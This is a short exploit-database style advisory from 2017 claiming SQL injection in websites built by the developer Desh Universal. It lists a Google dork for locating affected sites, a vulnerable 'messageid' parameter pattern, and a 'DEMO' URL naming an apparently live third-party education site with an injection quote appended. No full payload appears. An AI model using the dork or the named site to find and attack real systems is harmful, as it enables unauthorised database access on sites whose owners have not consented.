Desh Universal SQL Injection

2017-01-18
ID: 90051
CVE: None
Download vulnerable application: None
Exploit Title :  
Google Dork : intext:"Design & Development by Desh Universal (Pvt.)"
Google Dork2 : Use Your Mind Pls !
Date : 17/01/2017
Exploit Author : Houssem_Rx
Vendor Homepage : http://deshuniversal.com/
Tested on : Kali Linux

## Vulnerability : ## 

1. Description
An attacker can exploit this vulnerability to read from the database.
- HTTP Method : GET
2. SQL Injection / Proof of Concept:
Vulnerable Parametre: All Parametres are Vulnerable.
http://localhost/[PATH]/messages?messageid=[SQL]
3. DEMO :
http://www.dcgpsc.edu.bd/all-staff.php?id=2' [SQL INJECTION VULNERABILITY]

# Discovered by : Houssem_Rx
1-4-2 (www02)